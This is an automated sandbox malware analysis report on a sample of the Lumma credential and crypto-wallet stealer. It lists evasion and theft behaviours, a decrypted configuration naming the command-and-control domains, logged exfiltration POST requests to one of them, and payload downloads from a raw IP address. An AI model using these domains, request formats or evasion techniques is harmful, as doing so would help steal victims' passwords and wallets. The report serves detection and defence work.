Windows Analysis Report
13w4NM6mPa.exe

Overview

General Information

Sample name: 13w4NM6mPa.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name: 7058f9c58a4724f83bdc42c386e10471898503e6f46706bf269996350deabe5a
Analysis ID: 1428517
MD5: 76761104aad9e5fa6b474d9e5cf667be
SHA1: b171274d11b496eac726d4a093a304fc1ac09479
SHA256: 7058f9c58a4724f83bdc42c386e10471898503e6f46706bf269996350deabe5a
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Creates HTML files with .exe extension (expired dropper behavior)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Self deletion via cmd or bat file
Tries to evade analysis by execution special instruction (VM detection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses ping.exe to check the status of other devices and networks
AV process strings found (often used to terminate AV products)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Downloads executable code via HTTP
Drops PE files
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

AV Detection

barindex
Source: lWjPtDoy2N.exe.3368.6.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["demonstationfukewko.shop", "liabilitynighstjsko.shop", "alcojoldwograpciw.shop", "incredibleextedwj.shop", "shortsvelventysjo.shop", "shatterbreathepsw.shop", "tolerateilusidjukl.shop", "productivelookewr.shop", "poledoverglazedkilio.shop"], "Build id": "MeDNN1--NEW"}
Source: 13w4NM6mPa.exe ReversingLabs: Detection: 13%
Source: 13w4NM6mPa.exe Virustotal: Detection: 24% Perma Link
Source: C:\Users\user\Desktop\lWjPtDoy2N.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\promo[1].exe Joe Sandbox ML: detected
Source: 13w4NM6mPa.exe Joe Sandbox ML: detected
Source: 00000006.00000002.2061815022.0000000000D0D000.00000002.00000001.01000000.00000006.sdmp String decryptor: demonstationfukewko.shop
Source: 00000006.00000002.2061815022.0000000000D0D000.00000002.00000001.01000000.00000006.sdmp String decryptor: liabilitynighstjsko.shop
Source: 00000006.00000002.2061815022.0000000000D0D000.00000002.00000001.01000000.00000006.sdmp String decryptor: alcojoldwograpciw.shop
Source: 00000006.00000002.2061815022.0000000000D0D000.00000002.00000001.01000000.00000006.sdmp String decryptor: incredibleextedwj.shop
Source: 00000006.00000002.2061815022.0000000000D0D000.00000002.00000001.01000000.00000006.sdmp String decryptor: shortsvelventysjo.shop
Source: 00000006.00000002.2061815022.0000000000D0D000.00000002.00000001.01000000.00000006.sdmp String decryptor: shatterbreathepsw.shop
Source: 00000006.00000002.2061815022.0000000000D0D000.00000002.00000001.01000000.00000006.sdmp String decryptor: tolerateilusidjukl.shop
Source: 00000006.00000002.2061815022.0000000000D0D000.00000002.00000001.01000000.00000006.sdmp String decryptor: productivelookewr.shop
Source: 00000006.00000002.2061815022.0000000000D0D000.00000002.00000001.01000000.00000006.sdmp String decryptor: poledoverglazedkilio.shop
Source: 00000006.00000002.2061815022.0000000000D0D000.00000002.00000001.01000000.00000006.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000006.00000002.2061815022.0000000000D0D000.00000002.00000001.01000000.00000006.sdmp String decryptor: TeslaBrowser/5.5
Source: 00000006.00000002.2061815022.0000000000D0D000.00000002.00000001.01000000.00000006.sdmp String decryptor: - Screen Resoluton:
Source: 00000006.00000002.2061815022.0000000000D0D000.00000002.00000001.01000000.00000006.sdmp String decryptor: - Physical Installed Memory:
Source: 00000006.00000002.2061815022.0000000000D0D000.00000002.00000001.01000000.00000006.sdmp String decryptor: Workgroup: -
Source: 00000006.00000002.2061815022.0000000000D0D000.00000002.00000001.01000000.00000006.sdmp String decryptor: MeDNN1--NEW
Source: 13w4NM6mPa.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 172.67.153.60:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.153.60:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.153.60:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.153.60:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.153.60:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.153.60:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.153.60:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.153.60:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: 13w4NM6mPa.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

barindex
Source: Traffic Snort IDS: 2839343 ETPRO MALWARE InnoDownloadPlugin User-Agent Observed 192.168.2.4:49732 -> 38.180.21.197:80
Source: Malware configuration extractor URLs: demonstationfukewko.shop
Source: Malware configuration extractor URLs: liabilitynighstjsko.shop
Source: Malware configuration extractor URLs: alcojoldwograpciw.shop
Source: Malware configuration extractor URLs: incredibleextedwj.shop
Source: Malware configuration extractor URLs: shortsvelventysjo.shop
Source: Malware configuration extractor URLs: shatterbreathepsw.shop
Source: Malware configuration extractor URLs: tolerateilusidjukl.shop
Source: Malware configuration extractor URLs: productivelookewr.shop
Source: Malware configuration extractor URLs: poledoverglazedkilio.shop
Source: C:\Users\user\Desktop\13w4NM6mPa.exe File created: IqIzor5JSF.exe.0.dr
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 02:57:50 GMTContent-Type: application/octet-streamContent-Length: 20028832Connection: keep-aliveContent-Disposition: attachment; filename=promo.exeData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 08 00 3e 19 21 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b2 03 00 00 92 04 00 00 00 00 00 ce 7b ae 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 dc 01 00 04 00 00 c6 06 32 01 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc 01 3e 01 a0 00 00 00 00 e0 d8 01 1a 7e 03 00 00 00 00 00 00 00 00 00 00 82 31 01 a0 1b 00 00 00 d0 d8 01 70 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 aa 00 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 43 b1 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fb 28 00 00 00 d0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 88 ae 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 6c 6d 6b 6c 6e 33 60 18 a6 00 00 b0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 6c 6d 6b 6c 6e 33 dc 03 00 00 00 d0 aa 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 6c 6d 6b 6c 6e 33 b0 ef 2d 01 00 e0 aa 00 00 f0 2d 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 70 09 00 00 00 d0 d8 01 00 0a 00 00 00 f8 2d 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 1a 7e 03 00 00 e0 d8 01 00 80 03 00 00 02 2e 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: Joe Sandbox View IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View ASN Name: COGENT-174US COGENT-174US
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknown DNS query: name: ip-api.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: poledoverglazedkilio.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: poledoverglazedkilio.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18161Host: poledoverglazedkilio.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8782Host: poledoverglazedkilio.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20435Host: poledoverglazedkilio.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 3790Host: poledoverglazedkilio.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1426Host: poledoverglazedkilio.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1076Host: poledoverglazedkilio.shop
Source: global traffic HTTP traffic detected: GET /json HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ip-api.comCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: unknown TCP traffic detected without corresponding DNS query: 38.180.21.197
Source: global traffic HTTP traffic detected: GET /json HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ip-api.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /stats/17/0/0 HTTP/1.1User-Agent: InnoDownloadPlugin/1.4.3Host: 38.180.21.197Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /stats/15/0/0 HTTP/1.1User-Agent: InnoDownloadPlugin/1.4.3Host: 38.180.21.197Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /archives/5 HTTP/1.1User-Agent: InnoDownloadPlugin/1.4.3Host: 38.180.21.197Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /archives/17 HTTP/1.1User-Agent: InnoDownloadPlugin/1.4.3Host: 38.180.21.197Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /stats/17/1/1 HTTP/1.1User-Agent: InnoDownloadPlugin/1.4.3Host: 38.180.21.197Cache-Control: no-cache
Source: unknown DNS traffic detected: queries for: ip-api.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: poledoverglazedkilio.shop
Source: 13w4NM6mPa.exe, 00000000.00000002.2074988634.0000000000B8E000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://38.180.21.197/archives/15
Source: 13w4NM6mPa.exe, 00000000.00000002.2078093614.00000000031D3000.00000004.00000020.00020000.00000000.sdmp, 13w4NM6mPa.exe, 00000000.00000002.2074988634.0000000000B8E000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://38.180.21.197/archives/17
Source: 13w4NM6mPa.exe, 00000000.00000002.2078093614.00000000031D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://38.180.21.197/archives/17?
Source: 13w4NM6mPa.exe, 00000000.00000002.2078093614.00000000031D3000.00000004.00000020.00020000.00000000.sdmp, 13w4NM6mPa.exe, 00000000.00000002.2074988634.0000000000B8E000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://38.180.21.197/archives/5
Source: 13w4NM6mPa.exe, 00000000.00000002.2078093614.00000000031D3000.00000004.00000020.00020000.00000000.sdmp, 13w4NM6mPa.exe, 00000000.00000002.2074988634.0000000000B8E000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://38.180.21.197/stats/15/0/0
Source: 13w4NM6mPa.exe, 00000000.00000002.2074988634.0000000000B8E000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://38.180.21.197/stats/15/1/1
Source: 13w4NM6mPa.exe, 00000000.00000002.2078093614.00000000031D3000.00000004.00000020.00020000.00000000.sdmp, 13w4NM6mPa.exe, 00000000.00000002.2074988634.0000000000B8E000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://38.180.21.197/stats/17/0/0
Source: 13w4NM6mPa.exe, 00000000.00000002.2074988634.0000000000B8E000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://38.180.21.197/stats/17/0/0http://38.180.21.197/stats/15/0/0http://38.180.21.197/archives/5htt
Source: 13w4NM6mPa.exe, 00000000.00000002.2074988634.0000000000B8E000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://38.180.21.197/stats/17/1/1
Source: 13w4NM6mPa.exe, 00000000.00000002.2078093614.00000000031D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://38.180.21.197/stats/17/1/1I
Source: 13w4NM6mPa.exe, 00000000.00000002.2078093614.00000000031D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://38.180.21.197/stats/17/1/1S
Source: lWjPtDoy2N.exe, 00000006.00000003.1980631194.0000000005800000.00000004.00000800.00020000.00000000.sdmp, 13w4NM6mPa.exe, lWjPtDoy2N.exe.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: lWjPtDoy2N.exe, 00000006.00000003.2017933046.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: lWjPtDoy2N.exe, 00000006.00000003.2017933046.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lWjPtDoy2N.exe, 00000006.00000003.1980631194.0000000005800000.00000004.00000800.00020000.00000000.sdmp, 13w4NM6mPa.exe, lWjPtDoy2N.exe.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: lWjPtDoy2N.exe, 00000006.00000003.1980631194.0000000005800000.00000004.00000800.00020000.00000000.sdmp, 13w4NM6mPa.exe, lWjPtDoy2N.exe.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: lWjPtDoy2N.exe, 00000006.00000003.2017933046.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: lWjPtDoy2N.exe, 00000006.00000003.1980631194.0000000005800000.00000004.00000800.00020000.00000000.sdmp, 13w4NM6mPa.exe, lWjPtDoy2N.exe.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: lWjPtDoy2N.exe, 00000006.00000003.2017933046.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: lWjPtDoy2N.exe, 00000006.00000003.2017933046.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lWjPtDoy2N.exe, 00000006.00000003.1980631194.0000000005800000.00000004.00000800.00020000.00000000.sdmp, 13w4NM6mPa.exe, lWjPtDoy2N.exe.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: lWjPtDoy2N.exe, 00000006.00000003.1980631194.0000000005800000.00000004.00000800.00020000.00000000.sdmp, 13w4NM6mPa.exe, lWjPtDoy2N.exe.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: lWjPtDoy2N.exe, 00000006.00000003.2017933046.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lWjPtDoy2N.exe, 00000006.00000003.2017933046.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 13w4NM6mPa.exe, 00000000.00000002.2074988634.0000000000B8E000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://ip-api.com/json
Source: 13w4NM6mPa.exe, 00000000.00000002.2078093614.000000000318E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/jsonSOR_
Source: lWjPtDoy2N.exe, 00000006.00000003.2017933046.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: lWjPtDoy2N.exe, 00000006.00000003.1980631194.0000000005800000.00000004.00000800.00020000.00000000.sdmp, 13w4NM6mPa.exe, lWjPtDoy2N.exe.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: lWjPtDoy2N.exe, 00000006.00000003.1980631194.0000000005800000.00000004.00000800.00020000.00000000.sdmp, 13w4NM6mPa.exe, lWjPtDoy2N.exe.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: lWjPtDoy2N.exe, 00000006.00000003.1980631194.0000000005800000.00000004.00000800.00020000.00000000.sdmp, 13w4NM6mPa.exe, lWjPtDoy2N.exe.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: lWjPtDoy2N.exe, 00000006.00000003.2017933046.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.0.dr String found in binary or memory: http://upx.sf.net
Source: lWjPtDoy2N.exe, 00000006.00000003.2017933046.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: lWjPtDoy2N.exe, 00000006.00000003.2017933046.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: lWjPtDoy2N.exe, 00000006.00000003.2000903797.0000000002ED3000.00000004.00000020.00020000.00000000.sdmp, lWjPtDoy2N.exe, 00000006.00000003.2000839633.0000000005401000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: lWjPtDoy2N.exe, 00000006.00000003.2000903797.0000000002ED3000.00000004.00000020.00020000.00000000.sdmp, lWjPtDoy2N.exe, 00000006.00000003.2000839633.0000000005401000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: lWjPtDoy2N.exe, 00000006.00000003.2000903797.0000000002ED3000.00000004.00000020.00020000.00000000.sdmp, lWjPtDoy2N.exe, 00000006.00000003.2000839633.0000000005401000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: lWjPtDoy2N.exe, 00000006.00000003.2000903797.0000000002ED3000.00000004.00000020.00020000.00000000.sdmp, lWjPtDoy2N.exe, 00000006.00000003.2000839633.0000000005401000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: lWjPtDoy2N.exe, 00000006.00000003.2000903797.0000000002ED3000.00000004.00000020.00020000.00000000.sdmp, lWjPtDoy2N.exe, 00000006.00000003.2000839633.0000000005401000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: lWjPtDoy2N.exe, 00000006.00000003.2000903797.0000000002ED3000.00000004.00000020.00020000.00000000.sdmp, lWjPtDoy2N.exe, 00000006.00000003.2000839633.0000000005401000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: lWjPtDoy2N.exe, 00000006.00000003.2000903797.0000000002ED3000.00000004.00000020.00020000.00000000.sdmp, lWjPtDoy2N.exe, 00000006.00000003.2000839633.0000000005401000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: lWjPtDoy2N.exe, 00000006.00000002.2064322984.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, lWjPtDoy2N.exe, 00000006.00000002.2064391491.0000000002EAD000.00000004.00000020.00020000.00000000.sdmp, lWjPtDoy2N.exe, 00000006.00000002.2064343383.0000000002E6F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://poledoverglazedkilio.shop/
Source: lWjPtDoy2N.exe, 00000006.00000002.2064287490.0000000002E56000.00000004.00000020.00020000.00000000.sdmp, lWjPtDoy2N.exe, 00000006.00000002.2064391491.0000000002EAD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://poledoverglazedkilio.shop/api
Source: 13w4NM6mPa.exe String found in binary or memory: https://pwsafe.org:
Source: lWjPtDoy2N.exe, 00000006.00000003.2000419397.000000000542E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.microsof
